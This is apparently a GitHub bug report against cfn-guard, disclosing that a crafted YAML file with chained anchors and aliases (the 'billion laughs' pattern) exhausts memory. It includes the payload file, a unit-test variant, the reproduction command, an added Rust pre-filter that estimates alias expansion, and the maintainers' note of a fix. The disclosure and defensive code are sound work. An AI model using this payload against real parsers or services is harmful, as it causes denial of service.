
[BUG] DoS using Crafted Yaml file

Open sepehrdaddev opened this issue 4 years ago • 3 comments

Describe the bug
cfn-guard uses an uncontrolled amount of memory (RAM) while processing a carefully crafted CloudFormation template in YAML format, resulting in denial of service.

To Reproduce

  • Rule used (rule.guard):
let excluded_resources = [
    /AWS::AmazonBroker/,
    /AWS::App*/
]
let resources = Resources.*[
    Type not in %excluded_resources
]
rule assert_all_resources_have_non_empty_tags when %resources !empty {
    %resources.Properties.Tags !empty
}
  • Template used (crash.yaml):
# Each level aliases the previous one nine times, so test10 alone expands to 9^9 (387,420,489) scalars.
test1: &test1 "test"
test2: &test2 [*test1,*test1,*test1,*test1,*test1,*test1,*test1,*test1,*test1]
test3: &test3 [*test2,*test2,*test2,*test2,*test2,*test2,*test2,*test2,*test2]
test4: &test4 [*test3,*test3,*test3,*test3,*test3,*test3,*test3,*test3,*test3]
test5: &test5 [*test4,*test4,*test4,*test4,*test4,*test4,*test4,*test4,*test4]
test6: &test6 [*test5,*test5,*test5,*test5,*test5,*test5,*test5,*test5,*test5]
test7: &test7 [*test6,*test6,*test6,*test6,*test6,*test6,*test6,*test6,*test6]
test8: &test8 [*test7,*test7,*test7,*test7,*test7,*test7,*test7,*test7,*test7]
test9: &test9 [*test8,*test8,*test8,*test8,*test8,*test8,*test8,*test8,*test8]
test10: &test10 [*test9,*test9,*test9,*test9,*test9,*test9,*test9,*test9,*test9]
  • Command used: cfn-guard validate -d crash.yaml -r rule.guard

  • Output: cfn-guard fills the operating system's memory until the OOM killer kills the process; no output is generated by cfn-guard.

Expected behavior
It is expected to get a parsing error.

Operating System: Ubuntu 20.04, Amazon Linux 2

sepehrdaddev, Nov 23 '21 09:11
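The crash.yaml above is a chained-alias document (the "billion laughs" pattern applied to YAML anchors): every level references the previous one nine times, so a loader that materialises aliases eagerly has to build 9^9 copies of the leaf scalar for test10 alone, plus all the intermediate lists, before any rule is evaluated. One way to defend against this is to reject a document before it reaches the full YAML parser when its alias expansion would exceed a budget. The block below is an added example written for this page, not code from the cloudformation-guard project or from the reporter: a standard-library-only Rust scanner that counts anchors and aliases per line and estimates the expanded node count. It assumes that an anchor's node extends over the following lines indented deeper than the anchor's own line (a heuristic, not YAML's real scoping rules), and the budget MAX_EXPANDED_NODES is a made-up value; the benign template it checks against is constructed for the example.

```rust
use std::collections::HashMap;

/// Budget for nodes after alias expansion; hypothetical value chosen for this example.
pub const MAX_EXPANDED_NODES: u64 = 1_000_000;

/// Per-line scan result: indentation, blank/comment flag, `&anchor` names, `*alias` names.
struct Line { indent: usize, blank: bool, anchors: Vec<String>, aliases: Vec<String> }

/// Token scan of one line (not a YAML parser): skips quoted scalars and comments and
/// picks up `&name` / `*name` only where a YAML node may start.
fn scan_line(text: &str) -> Line {
    let chars: Vec<char> = text.chars().collect();
    let indent = text.len() - text.trim_start().len();
    let blank = text.trim().is_empty() || text.trim_start().starts_with('#');
    let (mut anchors, mut aliases) = (Vec::new(), Vec::new());
    let mut i = 0;
    while i < chars.len() {
        let c = chars[i];
        let boundary = i == 0 || matches!(chars[i - 1], ' ' | '\t' | '[' | '{' | ',');
        match c {
            '"' | '\'' => {
                i += 1; // skip to the closing quote on this line
                while i < chars.len() && chars[i] != c { i += 1; }
            }
            '#' if boundary => break, // comment runs to end of line
            '&' | '*' if boundary => {
                let (start, mut end) = (i + 1, i + 1);
                while end < chars.len() && !matches!(chars[end], ' ' | '\t' | '[' | ']' | '{' | '}' | ',') { end += 1; }
                if end > start {
                    let name: String = chars[start..end].iter().collect();
                    if c == '&' { anchors.push(name) } else { aliases.push(name) }
                }
                i = end;
                continue;
            }
            _ => {}
        }
        i += 1;
    }
    Line { indent, blank, anchors, aliases }
}

/// End of an anchored node's subtree: the first later non-blank line that is not indented
/// deeper than the anchor's own line. Indentation scoping is the heuristic assumed here.
fn subtree_end(lines: &[Line], def: usize) -> usize {
    let base = lines[def].indent;
    (def + 1..lines.len()).find(|&i| !lines[i].blank && lines[i].indent <= base).unwrap_or(lines.len())
}

/// Estimate the node count once every alias is substituted. Each non-blank line is one node
/// and an alias adds the expanded cost of its anchor's whole subtree, so the chained aliases
/// in crash.yaml multiply instead of adding. Undefined and self-referential aliases are errors.
pub fn expanded_node_count(doc: &str) -> Result<u64, String> {
    let lines: Vec<Line> = doc.lines().map(scan_line).collect();
    let mut defs: HashMap<&str, usize> = HashMap::new(); // anchor name -> defining line
    let mut line_cost: Vec<u64> = Vec::with_capacity(lines.len());
    let mut total: u64 = 0;
    for (idx, line) in lines.iter().enumerate() {
        let mut cost: u64 = if line.blank { 0 } else { 1 };
        for alias in &line.aliases {
            let def = *defs.get(alias.as_str())
                .ok_or_else(|| format!("line {}: alias *{} is undefined", idx + 1, alias))?;
            let end = subtree_end(&lines, def);
            if idx < end {
                return Err(format!("line {}: alias *{} refers to an enclosing anchor", idx + 1, alias));
            }
            let sub = line_cost[def..end].iter().try_fold(0u64, |acc, &c| acc.checked_add(c));
            cost = cost.checked_add(sub.ok_or("expansion overflows u64")?).ok_or("expansion overflows u64")?;
        }
        for anchor in &line.anchors { defs.insert(anchor.as_str(), idx); }
        line_cost.push(cost);
        total = total.checked_add(cost).ok_or("expansion overflows u64")?;
    }
    Ok(total)
}

/// Gate a document before it reaches a full YAML parser.
pub fn check_alias_budget(doc: &str) -> Result<u64, String> {
    match expanded_node_count(doc)? {
        n if n > MAX_EXPANDED_NODES => Err(format!("alias expansion yields {} nodes, budget is {}", n, MAX_EXPANDED_NODES)),
        n => Ok(n),
    }
}

/// The report's chained-alias document for any depth and fan-out (crash.yaml is depth 10, fan-out 9).
pub fn crash_document(depth: usize, fanout: usize) -> String {
    let mut out = String::from("test1: &test1 \"test\"\n");
    for n in 2..=depth {
        let refs = vec![format!("*test{}", n - 1); fanout].join(",");
        out.push_str(&format!("test{}: &test{} [{}]\n", n, n, refs));
    }
    out
}

/// Constructed benign template: one anchor reused once, as real templates do.
pub const BENIGN_TEMPLATE: &str = concat!(
    "Resources:\n  Bucket:\n    Properties:\n      Tags: &tags\n        - Key: env\n",
    "  Queue:\n    Properties:\n      Tags: *tags\n",
);

fn main() {
    println!("benign template: {:?}", check_alias_budget(BENIGN_TEMPLATE));
    println!("crash.yaml: {:?}", check_alias_budget(&crash_document(10, 9)));
}
```

For the reporter's crash.yaml the estimate is 490,329,055 nodes (the closed form is the sum of (9^n - 1)/8 for n from 1 to 10), which the gate rejects without allocating anything beyond a few vectors; the constructed benign template scores 10 and passes. The estimate is deliberately cheap rather than exact: a multi-line block anchor that the indentation heuristic mis-scopes will be under- or over-counted, so treat this as a pre-filter in front of a real parser with its own recursion and size limits, not as a replacement for one.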

Thank you for reporting this bug. Is the snippet provided above sufficient to reproduce the problem?

dchakrav-github, Nov 29 '21 20:11

Hi @dchakrav-github, yes, this is the complete code that I used to find this bug.

sepehrdaddev, Nov 29 '21 21:11

Hi, I found that it also affects unit tests; the following are examples of such cases:

  • Rules (rule.guard):
let excluded_resources = [
    /AWS::AmazonBroker/,
    /AWS::App*/
]
let resources = Resources.*[
    Type not in %excluded_resources
]
rule assert_all_resources_have_non_empty_tags when %resources !empty {
    %resources.Properties.Tags !empty
}
  • Unit test file (rule-tests.yaml):
- name: Allowed from CORRECT, expected PASS 
  input:
    test1: &test1 "test" 
    test2: &test2 [*test1,*test1,*test1,*test1,*test1,*test1,*test1,*test1,*test1]
    test3: &test3 [*test2,*test2,*test2,*test2,*test2,*test2,*test2,*test2,*test2]
    test4: &test4 [*test3,*test3,*test3,*test3,*test3,*test3,*test3,*test3,*test3]
    test5: &test5 [*test4,*test4,*test4,*test4,*test4,*test4,*test4,*test4,*test4]
    test6: &test6 [*test5,*test5,*test5,*test5,*test5,*test5,*test5,*test5,*test5]
    test7: &test7 [*test6,*test6,*test6,*test6,*test6,*test6,*test6,*test6,*test6]
    test8: &test8 [*test7,*test7,*test7,*test7,*test7,*test7,*test7,*test7,*test7]
    test9: &test9 [*test8,*test8,*test8,*test8,*test8,*test8,*test8,*test8,*test8]
    test10: &test10 [*test9,*test9,*test9,*test9,*test9,*test9,*test9,*test9,*test9]
  expectations:
    rules:
      assert_all_resources_have_non_empty_tags: PASS
  • Command used: cfn-guard test -t rule-tests.yaml -r rule.guard

sepehrdaddev, Dec 29 '21 22:12

Hi @sepehrdaddev, we have merged a fix for this issue (#276). Feel free to test it out again, and re-open if you find anything more.

Thanks,

joshfried-aws, Sep 21 '22 20:09